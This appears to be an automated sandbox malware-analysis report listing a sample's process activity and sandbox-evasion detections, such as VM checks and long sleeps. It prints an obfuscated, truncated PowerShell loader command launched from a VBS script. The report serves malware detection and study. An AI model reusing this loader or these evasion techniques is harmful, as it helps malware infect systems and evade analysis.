Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect Any.run
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Potential evasive VBS script found (use of timer() function in loop)
Source: Initial file Initial file: do while timer-temp<sec
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2344 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 5860 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 5860 Thread sleep count: 382 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 5860 Thread sleep time: -11460000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 5860 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.dll Jump to dropped file
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8949 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Window / User API: threadDelayed 382 Jump to behavior
Found evasive API chain (may stop execution after accessing registry keys)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Evasive API call chain: RegQueryValue,DecisionNodes,Sleep
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe System information queried: ModuleInformation Jump to behavior
Source: wscript.exe, 00000000.00000002.259228881.0000012BBB50F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process token adjusted: Debug Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_20105110 LdrInitializeThunk, 17_2_20105110
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Memory allocated: page read and write | page guard Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$skoleeksempel = """smadrdzodsy-cotblysapceech lo-untoryhapudefodmaesyfcaimhnnaiphtprifoopenpe uf'teuresblihensmgge tasskyopsqutueeanmbo;baudosfrialnorgje kasfjymissptvmedrmra.corbautunvatwaipamsaetr.viimanuntgieomrbaohuphysgoeimrapvtriomccleovsna;popafuchbkulduimocdo dasletanabutlyipocjo arcfelunaamshesno disudtnouspeinoburscgrelaseelrovsax1re ti{pr[sudwhlfolfeirimunpazosurpatst(en`"""aswopimaninsaspcaonoofolsg.redngrekvre`"""po)ho]frptruembselzeichcdj biskatglaprtimigeche paeobxfotreemirbrnca liiacnsutel enpderefifonbatmaefirafmscecostesadadigheemibpeoapxva(meisunretba skshytopahebrrlst,asibunbatsc sydsneadldeaungoptfo,pribinbitro skcunrpuobl,laitunhytla norfribevreuvalun,raironcatet eptmarfrobapkeiefcba,seirunmotll cosvakseibotfosreecr)bi;cy[rtdmulbalatilimlapfeorerimtin(ra`"""klaundeuvleaacpbaiaf3fr2pa.codanlhallg`"""tu)sp]repgrujubmulstioscoc masfatreauntraistckn reeprxpitdeeberennsi anigansgtaa snrinebrgerqgoubaeolrfrytridenclfchoenkwietryst(maistnfltmi nopspodutadtteehynsu,priprnsatfr ortskesolunereoarlde,akiinnbetfo coprelsaumerun,leiunnlatfl dyfsyufisefiimostnat,ouiioncuthe aasbeaillwa,baiponantrk kosgiaunuun,nyiginsrtbo stkloasnlreken,griarnmetdi hywtaetaeaf,odiemnfltir nugabohedgikko,siitonbrtim mesovymonhaabinro,veirenaatca brpagebyasj,vaihanphtgo nibbrinorgakpl)sa;su[andrelralmoisemhopyoopersntvi(re`"""dikwievorprnkoesmlqu3gl2os`"""un)sl]bopinugabkalamiflcfu rnsfetstaprtasicecov brezoxswtstereramnop stihancytph tedraudrprelsoihocknamutanemuhiraamnfodmilleesi(roispnbatop sphmijgaeun,unigunquttr crmloeakeavtesibenfl,reimonamtur hougonunounrsj,dyirantitfl kaemoxbeagecpr,ddiphnekttu baomavpiebrrbi,diitinmitrc udbfaidyooumsyepecdi,miibunxitop onsmiihulpausk)pr;kr[thdbalaflbaiinmfopdeororoptun(rh`"""mokfoesprprnexeamlad3he2op`"""ld)un]fepabufebskldeiincsn afsnetkeaeqtsaisucst saegrxdataneirrrenam neipenditdo fovfeiworbltceuopafllanainlbiluaosucel(moisunfatno prvde1ba,fditrnuntfo fival2tr,weispnsttka covfo3fo,osiganwitre savbe4ca)vi;ou[kadpalkrlfiianmscpvioxyrtitme(ax`"""maumeswietarek3di2kr`"""fa)ne]capleuwobmalydiincan bosextgrafrtciicocet opevaxentzuegnrkande alitinmaton usgfeenetvepovrklothpal(coifinfatbr uredegenyto,naitinbatls lesbehneati)as;ma[sidpllnelduicamvapsgoshrwatty(te`"""unujosdeecarco3sy2gu`"""fi)ur]skpstuanbhylheilycag smsmitsuatitodivacli boerwxtrtskeverunnno hyimonliteu blcthrovebraintfletjctiuopratstroiorpr(foidentitef glmiseunlunlfy,geitansotma korekrhalim,buisknertaw sufrilpoytagso,stiimnlatko acfbeaimsintsplbe,piiadnbrtpr crbreaagabenst1fo1pu1ha,hyistntytun stphasfoedaudi,shiennedtbg noqcouacaprkpieidrst)te;is[stdstlsulymichmmapafoudrpotta(bo`"""amadodbuvspaufpzoico3ba2bi`"""sh)va]sapunuaabgelhaibecun arssutjuaokthaioncpe coeprxictsretertinbi toilannutpo lysduehytarssbecorhivbiichcpresabmaifjtwesfr(snislnsater afgunaberre,nsipentytli hutudekonahogrndi,moitanfltte jodzoesesbapkr,maitrnsutsa gyeevxudpkl
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$skoleeksempel = """smadrdzodsy-cotblysapceech lo-untoryhapudefodmaesyfcaimhnnaiphtprifoopenpe uf'teuresblihensmgge tasskyopsqutueeanmbo;baudosfrialnorgje kasfjymissptvmedrmra.corbautunvatwaipamsaetr.viimanuntgieomrbaohuphysgoeimrapvtriomccleovsna;popafuchbkulduimocdo dasletanabutlyipocjo arcfelunaamshesno disudtnouspeinoburscgrelaseelrovsax1re ti{pr[sudwhlfolfeirimunpazosurpatst(en`"""aswopimaninsaspcaonoofolsg.redngrekvre`"""po)ho]frptruembselzeichcdj biskatglaprtimigeche paeobxfotreemirbrnca liiacnsutel enpderefifonbatmaefirafmscecostesadadigheemibpeoapxva(meisunretba skshytopahebrrlst,asibunbatsc sydsneadldeaungoptfo,pribinbitro skcunrpuobl,laitunhytla norfribevreuvalun,raironcatet eptmarfrobapkeiefcba,seirunmotll cosvakseibotfosreecr)bi;cy[rtdmulbalatilimlapfeorerimtin(ra`"""klaundeuvleaacpbaiaf3fr2pa.codanlhallg`"""tu)sp]repgrujubmulstioscoc masfatreauntraistckn reeprxpitdeeberennsi anigansgtaa snrinebrgerqgoubaeolrfrytridenclfchoenkwietryst(maistnfltmi nopspodutadtteehynsu,priprnsatfr ortskesolunereoarlde,akiinnbetfo coprelsaumerun,leiunnlatfl dyfsyufisefiimostnat,ouiioncuthe aasbeaillwa,baiponantrk kosgiaunuun,nyiginsrtbo stkloasnlreken,griarnmetdi hywtaetaeaf,odiemnfltir nugabohedgikko,siitonbrtim mesovymonhaabinro,veirenaatca brpagebyasj,vaihanphtgo nibbrinorgakpl)sa;su[andrelralmoisemhopyoopersntvi(re`"""dikwievorprnkoesmlqu3gl2os`"""un)sl]bopinugabkalamiflcfu rnsfetstaprtasicecov brezoxswtstereramnop stihancytph tedraudrprelsoihocknamutanemuhiraamnfodmilleesi(roispnbatop sphmijgaeun,unigunquttr crmloeakeavtesibenfl,reimonamtur hougonunounrsj,dyirantitfl kaemoxbeagecpr,ddiphnekttu baomavpiebrrbi,diitinmitrc udbfaidyooumsyepecdi,miibunxitop onsmiihulpausk)pr;kr[thdbalaflbaiinmfopdeororoptun(rh`"""mokfoesprprnexeamlad3he2op`"""ld)un]fepabufebskldeiincsn afsnetkeaeqtsaisucst saegrxdataneirrrenam neipenditdo fovfeiworbltceuopafllanainlbiluaosucel(moisunfatno prvde1ba,fditrnuntfo fival2tr,weispnsttka covfo3fo,osiganwitre savbe4ca)vi;ou[kadpalkrlfiianmscpvioxyrtitme(ax`"""maumeswietarek3di2kr`"""fa)ne]capleuwobmalydiincan bosextgrafrtciicocet opevaxentzuegnrkande alitinmaton usgfeenetvepovrklothpal(coifinfatbr uredegenyto,naitinbatls lesbehneati)as;ma[sidpllnelduicamvapsgoshrwatty(te`"""unujosdeecarco3sy2gu`"""fi)ur]skpstuanbhylheilycag smsmitsuatitodivacli boerwxtrtskeverunnno hyimonliteu blcthrovebraintfletjctiuopratstroiorpr(foidentitef glmiseunlunlfy,geitansotma korekrhalim,buisknertaw sufrilpoytagso,stiimnlatko acfbeaimsintsplbe,piiadnbrtpr crbreaagabenst1fo1pu1ha,hyistntytun stphasfoedaudi,shiennedtbg noqcouacaprkpieidrst)te;is[stdstlsulymichmmapafoudrpotta(bo`"""amadodbuvspaufpzoico3ba2bi`"""sh)va]sapunuaabgelhaibecun arssutjuaokthaioncpe coeprxictsretertinbi toilannutpo lysduehytarssbecorhivbiichcpresabmaifjtwesfr(snislnsater afgunaberre,nsipentytli hutudekonahogrndi,moitanfltte jodzoesesbapkr,maitrnsutsa gyeevxudpkl Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows Jump to behavior
